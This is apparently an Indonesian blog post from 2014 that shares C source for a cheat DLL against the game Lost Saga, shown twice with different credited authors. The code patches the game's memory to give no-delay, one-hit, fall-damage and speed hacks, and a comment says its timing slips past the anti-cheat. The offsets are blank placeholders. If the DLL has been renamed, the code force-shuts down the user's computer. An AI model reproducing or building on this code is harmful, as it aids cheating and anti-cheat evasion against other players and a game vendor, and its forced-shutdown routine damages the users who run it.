Sabtu, 11 Januari 2014

//===================================// //Name : Base LostSaga Fullhacks //Created : ™GMPB_SC™ //Thank'z : ALL Admin JamuCit //Notice : Nice! JamuCit //===================================// #define WIN32_LEAN_AND_MEAN #include #include #include //============ OFFSET ============ #define NoDelay 0x #define OneHitCSD 0x #define FallDamage 0x #define SpeedHack 0x //============ OFFSET ============ LPTSTR ModulGame = "lostsaga.exe"; void Patch(void *adr, void *ptr, int size) { DWORD OldProtection; VirtualProtect(adr,size,PAGE_EXECUTE_READWRITE, &OldProtection); memcpy(adr,ptr,size); VirtualProtect(adr,size,OldProtection, &OldProtection); } void WritePointer(unsigned long ulBase, int iOffset, int iValue) { if (!IsBadReadPtr((VOID*)ulBase, sizeof(unsigned long))) { if (!IsBadWritePtr((void*)(*(unsigned long*)ulBase + iOffset), sizeof(unsigned long))) { *(int*)(*(unsigned long*)ulBase + iOffset) = iValue; } } } void SagaHacy() { while(1) { //========== No Delay ==========// if (GetAsyncKeyState(VK_F1)&1) { MessageBeep(MB_ICONINFORMATION); DWORD adrMin1, adrMin2 = 0; DWORD dwPB = (DWORD)GetModuleHandleA("lostsaga.exe"); if (dwPB > 0) { adrMin1 = dwPB + (DWORD)NoDelay; Patch((void *)(adrMin1),(void*)(PBYTE)"\x00\x00\x00", 3); // Jangan di ganti Agar WORK } } //========== 1 Hit Crusade ==========// if (GetAsyncKeyState(VK_F2)&1) { MessageBeep(MB_ICONINFORMATION); DWORD adrMin1, adrMin2 = 0; DWORD dwPB = (DWORD)GetModuleHandleA("lostsaga.exe"); if (dwPB > 0) { adrMin1 = dwPB + (DWORD)OneHitCSD; Patch((void *)(adrMin1),(void*)(PBYTE)"\x00\x00\x00", 3);// Jangan di ganti Agar WORK } } //========== Fall Damage UP ==========// if (GetAsyncKeyState(VK_F3)&1) { MessageBeep(MB_ICONINFORMATION); DWORD adrMin1, adrMin2 = 0; DWORD dwPB = (DWORD)GetModuleHandleA("lostsaga.exe"); if (dwPB > 0) { adrMin1 = dwPB + (DWORD)FallDamage; Patch((void *)(adrMin1),(void*)(PBYTE)"\x00\x00\x00", 3);// Jangan di ganti Agar WORK } } //========== SpeedHack Hook ==========// if (GetAsyncKeyState(VK_F4)&1) { MessageBeep(MB_ICONINFORMATION); DWORD adrMin1, adrMin2 = 0; DWORD dwPB = (DWORD)GetModuleHandleA("lostsaga.exe"); if (dwPB > 0) { adrMin1 = dwPB + (DWORD)SpeedHack; Patch((void *)(adrMin1),(void*)(PBYTE)"\x00\x00\x00", 3);// Jangan di ganti Agar WORK } } Sleep(100); //Jangan di ganti , Agar Tembus GG Cowboy } } BOOL APIENTRY DllMain(HINSTANCE hDll, DWORD callReason, LPVOID lpReserved) { DisableThreadLibraryCalls(hDll); if(callReason == DLL_PROCESS_ATTACH) { MessageBox(0, "Credit by ™GMPB_SC™\n\nThank'z to : ALL Admin JamuCit", "Notice",MB_ICONINFORMATION | MB_OKCANCEL); // Notice yg Keluar MessageBox(0, "No Delay : F1\n1 Hit Crusade : F2\nFall Damage UP : F3\nSpeedHack Hook : F4\n\nTekan Saat Splash Cowboy Menghilang / Saat Mulai Splash Screen Hitam", "Just Work to OS Win 7",MB_ICONWARNING | MB_OKCANCEL); // Notice yg Keluar CreateThread(0, 0, (LPTHREAD_START_ROUTINE)&SagaHacy,0, 0, 0); char strDLLName [_MAX_PATH]; GetModuleFileName(hDll, strDLLName , _MAX_PATH); if (strstr(strDLLName, "Prohacy.dll") <= 0) {//Nama DLL Asli // tampilkan pesan, kalo dll nya sdh bukan asli / sudah di rename MessageBox(0, "Ente Leacher ?","Deteckor",MB_ICONSTOP | MB_OK); MessageBox(0, "Udah dikasih kok rename ?","Deteckor",MB_ICONSTOP | MB_OK); MessageBox(0, "Dadah !\nKompimu aku Restart ya :*","Deteckor",MB_ICONSTOP | MB_OK); system("start C:/Windows/System32/shutdown.exe -s -f -t 00"); ExitProcess(0);//ERROR } } }

//===================================//
//Name : Base LostSaga Fullhacks
//Created : Dimas Syahputra
//Thank'z : ALL Admin Prohacy.Net Teamz
//Notice  : Dilarang di sebar !
//===================================//

#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

//============ OFFSET ============
#define NoDelay 0x
#define OneHitCSD 0x
#define FallDamage 0x
#define SpeedHack 0x
//============ OFFSET ============


LPTSTR ModulGame = "lostsaga.exe";



void Patch(void *adr, void *ptr, int size)

{

DWORD OldProtection;

VirtualProtect(adr,size,PAGE_EXECUTE_READWRITE, &OldProtection);

memcpy(adr,ptr,size);

VirtualProtect(adr,size,OldProtection, &OldProtection);

}

void WritePointer(unsigned long ulBase, int iOffset, int iValue)

{

if (!IsBadReadPtr((VOID*)ulBase, sizeof(unsigned long)))

{

if (!IsBadWritePtr((void*)(*(unsigned long*)ulBase + iOffset), sizeof(unsigned long)))

{

*(int*)(*(unsigned long*)ulBase + iOffset) = iValue;

}

}

}



void SagaHacy()

{



while(1)
{

//========== No Delay ==========//
if (GetAsyncKeyState(VK_F1)&1) {
MessageBeep(MB_ICONINFORMATION);
DWORD adrMin1, adrMin2 = 0;
DWORD dwPB = (DWORD)GetModuleHandleA("lostsaga.exe");
if (dwPB > 0) {
adrMin1 = dwPB + (DWORD)NoDelay;
Patch((void *)(adrMin1),(void*)(PBYTE)"\x00\x00\x00", 3); // Jangan di ganti Agar WORK ^_^
}

}
//========== 1 Hit Crusade ==========//
if (GetAsyncKeyState(VK_F2)&1) {
MessageBeep(MB_ICONINFORMATION);
DWORD adrMin1, adrMin2 = 0;
DWORD dwPB = (DWORD)GetModuleHandleA("lostsaga.exe");
if (dwPB > 0) {
adrMin1 = dwPB + (DWORD)OneHitCSD;
Patch((void *)(adrMin1),(void*)(PBYTE)"\x00\x00\x00", 3);// Jangan di ganti Agar WORK ^_^
}

}

//========== Fall Damage UP ==========//
if (GetAsyncKeyState(VK_F3)&1) {
MessageBeep(MB_ICONINFORMATION);
DWORD adrMin1, adrMin2 = 0;
DWORD dwPB = (DWORD)GetModuleHandleA("lostsaga.exe");
if (dwPB > 0) {
adrMin1 = dwPB + (DWORD)FallDamage;
Patch((void *)(adrMin1),(void*)(PBYTE)"\x00\x00\x00", 3);// Jangan di ganti Agar WORK ^_^
}

}

//========== SpeedHack Hook ==========//
if (GetAsyncKeyState(VK_F4)&1) {
MessageBeep(MB_ICONINFORMATION);
DWORD adrMin1, adrMin2 = 0;
DWORD dwPB = (DWORD)GetModuleHandleA("lostsaga.exe");
if (dwPB > 0) {
adrMin1 = dwPB + (DWORD)SpeedHack;
Patch((void *)(adrMin1),(void*)(PBYTE)"\x00\x00\x00", 3);// Jangan di ganti Agar WORK ^_^
}

}

Sleep(100); //Jangan di ganti , Agar Tembus GG Cowboy



}



}

BOOL APIENTRY DllMain(HINSTANCE hDll, DWORD callReason, LPVOID lpReserved) {

DisableThreadLibraryCalls(hDll);

if(callReason == DLL_PROCESS_ATTACH) {
  
MessageBox(0, "Credit by Dimas Syahputra\n\nThank'z to : ALL Admin Prohacy.Net Teamz", "Notice",MB_ICONINFORMATION | MB_OKCANCEL); // Notice yg Keluar
MessageBox(0, "No Delay : F1\n1 Hit Crusade : F2\nFall Damage UP : F3\nSpeedHack Hook : F4\n\nTekan Saat Splash Cowboy Menghilang / Saat Mulai Splash Screen Hitam", "Just Work to OS Win 7",MB_ICONWARNING | MB_OKCANCEL); // Notice yg Keluar
CreateThread(0, 0, (LPTHREAD_START_ROUTINE)&SagaHacy,0, 0, 0);



char strDLLName [_MAX_PATH];

GetModuleFileName(hDll, strDLLName , _MAX_PATH);

if (strstr(strDLLName, "Prohacy.dll") <= 0) {//Nama DLL Asli

// tampilkan pesan, kalo dll nya sdh bukan asli / sudah di rename

MessageBox(0, "Ente Leacher ?","Deteckor",MB_ICONSTOP | MB_OK);
MessageBox(0, "Udah dikasih kok rename ?","Deteckor",MB_ICONSTOP | MB_OK);
MessageBox(0, "Dadah !\nKompimu aku Restart ya :*","Deteckor",MB_ICONSTOP | MB_OK);
system("start C:/Windows/System32/shutdown.exe -s -f -t 00");
ExitProcess(0);//ERROR

}



}


}